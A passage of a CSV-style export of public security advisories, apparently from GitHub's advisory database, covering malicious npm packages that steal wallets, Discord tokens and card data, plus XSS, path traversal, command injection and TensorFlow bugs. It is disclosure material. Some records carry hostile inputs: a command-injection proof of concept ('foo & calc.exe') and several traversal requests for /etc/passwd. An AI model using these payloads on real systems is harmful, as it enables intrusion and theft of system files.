+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'colour-string'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/903'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5h5r-23r4-m87h,2023-09-12T21:10:48Z,2020-09-01T16:04:39Z,,['CVE-2017-16019'],Cross-Site Scripting in gitbook,"Affected versions of `gitbook` do not properly sanitize user input outside of backticks, which may result in cross-site scripting in the online reader.
+
+
+## Recommendation
+
+Update to version 3.2.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gitbook'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16019'}, {'type': 'WEB', 'url': 'https://github.com/GitbookIO/gitbook/issues/1609'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/159'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jvfv-jhw9-jmpp,2021-09-29T20:22:21Z,2020-09-03T21:23:09Z,,[],Malicious Package in b5ffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'b5ffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1228'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-97mp-9g5c-6c93,2021-10-01T20:49:31Z,2020-09-04T16:50:48Z,,[],Malicious Package in bs58chcek,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs58chcek'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1375'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-63m4-fhf2-cmf7,2023-09-08T18:52:10Z,2020-09-01T16:43:55Z,,['CVE-2017-1000219'],Command Execution in windows-cpu,"Version of `windows-cpu` before 0.1.5 will execute arbitrary code passed into the first argument of the `findLoad` method, resulting in remote code execution.
+
+## Proof of Concept
+
+```js
+var win = require('windows-cpu');
+wind.findLoad('foo & calc.exe');
+```
+
+
+## Recommendation
+
+Update to version 0.1.5 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'windows-cpu'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000219'}, {'type': 'WEB', 'url': 'https://github.com/KyleRoss/windows-cpu/commit/b75e19aa2f7459a9506bceb577ba2341fe273117'}, {'type': 'PACKAGE', 'url': 'https://github.com/KyleRoss/windows-cpu'}, {'type': 'WEB', 'url': 'https://github.com/KyleRoss/windows-cpu/blob/master/index.js#L81'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/336'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j4ch-mw66-xmqv,2023-07-27T00:07:25Z,2020-09-03T19:16:44Z,,[],Malicious Package in pensi-scheduler,"Version 1.1.3 of `pensi-scheduler` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.1.2",[],"[{'package': {'ecosystem': 'npm', 'name': 'pensi-scheduler'}, 'versions': ['1.1.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1107'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4q2f-8g74-qm56,2020-08-31T18:45:01Z,2020-09-03T17:18:05Z,,[],Cross-Site Scripting in takeapeek,"All versions of `takeapeek` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'takeapeek'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/490728'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1038'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8fxw-76px-3rxv,2021-08-26T15:09:35Z,2020-09-25T18:28:17Z,,['CVE-2020-15192'],Memory leak in Tensorflow,"### Impact
+If a user passes a list of strings to `dlpack.to_dlpack` there is a memory leak following an expected validation failure:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L100-L104
+
+The allocated memory is from
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L256
+
+The issue occurs because the `status` argument during validation failures is not properly checked:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/c/eager/dlpack.cc#L265-L267
+
+Since each of the above methods can return an error status, the `status` value must be checked before continuing.
+
+### Patches
+We have patched the issue in 22e07fb204386768e5bcbea563641ea11f96ceb8 and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been discovered during variant analysis of [GHSA-rjjg-hgv6-h69v](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rjjg-hgv6-h69v).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8fxw-76px-3rxv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15192'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T16:22:58Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-322m-p39j-r5m2,2023-09-12T18:06:16Z,2020-09-01T18:55:37Z,,['CVE-2017-16128'],npm-script-demo is malware,"The `npm-script-demo` package is a piece of malware that opens a connection to a command and control server and executed the instructions it is given.
+
+It has been removed from the npm registry.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer has been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'npm-script-demo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16128'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/481'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wfhx-6pcm-7m55,2020-08-31T18:43:41Z,2020-09-03T16:46:22Z,,[],Path Traversal in ponse,"Versions of `ponse` prior to 2.0.2 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
+
+
+## Recommendation
+
+Upgrade to version 2.0.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ponse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/383112'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1002'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cwcp-6c48-fm7m,2023-09-07T22:01:58Z,2020-09-01T16:39:38Z,,['CVE-2017-16020'],Unsafe eval() in summit allows arbitrary code execution,"Affected versions of `summit` allow attackers to execute arbitrary commands via collection names when using the `PouchDB` driver.
+
+
+
+## Recommendation
+
+No direct patch is available at this time.
+
+Currently, the best option to mitigate the issue is to avoid using the `PouchDB` driver, as the package author has abandoned this feature entirely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'summit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16020'}, {'type': 'WEB', 'url': 'https://github.com/notduncansmith/summit/issues/23'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/315'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gvg7-pp82-cff3,2021-09-23T21:36:05Z,2020-09-01T15:59:11Z,,['CVE-2016-1000240'],Cross-Site Scripting in c3,"Affected versions of `c3` are vulnerable to cross-site scripting via improper sanitization of HTML in rendered tooltips.
+
+
+
+## Recommendation
+
+Update to 0.4.11 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'c3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.4.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000240'}, {'type': 'WEB', 'url': 'https://github.com/c3js/c3/issues/1536'}, {'type': 'WEB', 'url': 'https://github.com/c3js/c3/pull/1675'}, {'type': 'WEB', 'url': 'https://github.com/c3js/c3/commit/de3864650300488a63d0541620e9828b00e94b42'}, {'type': 'PACKAGE', 'url': 'https://github.com/c3js/c3'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/138'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-588m-9qg5-35pq,2021-09-28T22:06:18Z,2020-09-03T17:19:09Z,,[],Reverse Tabnabbing in quill,"Versions of `quill` prior to 1.3.7 are vulnerable to [Reverse Tabnabbing](https://www.owasp.org/index.php/Reverse_Tabnabbing). The package uses `target='_blank'` in anchor tags, allowing attackers to access `window.opener` for the original page when opening links. This is commonly used for phishing attacks.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'quill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/quilljs/quill/issues/2438'}, {'type': 'WEB', 'url': 'https://github.com/quilljs/quill/pull/2674'}, {'type': 'PACKAGE', 'url': 'https://github.com/quilljs/quill'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1039'}]","{'cwe_ids': ['CWE-1022'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w5q7-3pr9-x44w,2020-08-31T18:35:52Z,2020-09-02T15:59:19Z,,[],Denial of Service in serialize-to-js,"Versions of `serialize-to-js` prior to 2.0.0 are vulnerable to Denial of Service. User input is not properly validated, allowing attackers to provide inputs that lead the execution to loop indefinitely.
+
+
+## Recommendation
+
+Upgrade to version 2.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'serialize-to-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/790'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:35:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wqr3-24xm-fxhq,2023-09-11T16:37:49Z,2020-09-01T17:31:22Z,,['CVE-2017-16168'],Directory Traversal in wffserve,"Affected versions of `wffserve` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'wffserve'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16168'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/city-weather-abe'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wffserve'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/407'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xj6q-9hx8-mm7f,2023-09-05T23:30:59Z,2020-09-01T17:34:34Z,,['CVE-2017-16170'],Directory Traversal in liuyaserver,"Affected versions of `liuyaserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'liuyaserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16170'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/liuyaserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/413'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q8gv-q7wr-9jf8,2021-08-26T15:17:12Z,2020-09-25T18:28:41Z,,['CVE-2020-15204'],Segfault in Tensorflow,"### Impact
+In eager mode, TensorFlow does not set the session state. Hence, calling `tf.raw_ops.GetSessionHandle` or `tf.raw_ops.GetSessionHandleV2` results in a null pointer dereference:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/session_ops.cc#L45
+
+In the above snippet, in eager mode, `ctx->session_state()` returns `nullptr`. Since code immediately dereferences this, we get a segmentation fault.
+
+### Patches
+We have patched the issue in 9a133d73ae4b4664d22bd1aa6d654fec13c52ee1 and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-q8gv-q7wr-9jf8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15204'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9a133d73ae4b4664d22bd1aa6d654fec13c52ee1'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:46:27Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-rhc3-76jw-4f2x,2020-08-31T19:00:35Z,2020-09-04T17:58:46Z,,[],Denial of Service in @commercial/ammo,"Versions of `@commercial/ammo` prior to 2.1.1 are vulnerable to Denial of Service. The Range HTTP header parser has a vulnerability which will cause the function to throw a system error if the header is set to an invalid value. Because hapi is not expecting the function to ever throw, the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to version 2.1.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@commercial/ammo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1473'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w9q5-mvc6-5cw3,2021-09-29T20:56:43Z,2020-09-03T21:45:13Z,,[],Malicious Package in bufder-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bufder-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1235'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8j7x-pr59-m5h8,2021-09-30T21:37:21Z,2020-09-02T21:31:18Z,,[],Malicious Package in whiteproject,"All versions of `whiteproject` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts.
+
+
+## Recommendation
+
+Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'whiteproject'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/898'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vhx6-cp8w-295m,2023-09-08T18:50:06Z,2020-09-01T16:55:45Z,,['CVE-2017-16095'],Directory Traversal in serverliujiayi1,"Affected versions of `serverliujiayi1` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serverliujiayi1'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16095'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverliujiayi1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/367'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r32x-jhw5-g48p,2021-09-28T21:17:47Z,2020-09-03T17:08:20Z,,[],Cross-Site Scripting in eco,"All versions of `eco` are vulnerable to Cross-Site Scripting (XSS). The package's default `__escape` implementation fails to escape single quotes, which may allow attackers to execute arbitrary JavaScript on the victim's browser.
+
+
+## Recommendation
+
